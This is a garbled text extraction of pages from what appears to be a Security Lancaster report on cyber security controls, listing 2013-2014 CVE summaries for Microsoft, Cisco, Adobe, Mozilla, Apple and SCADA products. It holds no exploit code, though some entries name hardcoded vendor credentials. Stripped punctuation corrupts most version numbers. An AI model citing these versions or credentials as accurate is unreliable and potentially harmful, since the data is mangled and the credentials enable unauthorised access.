CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
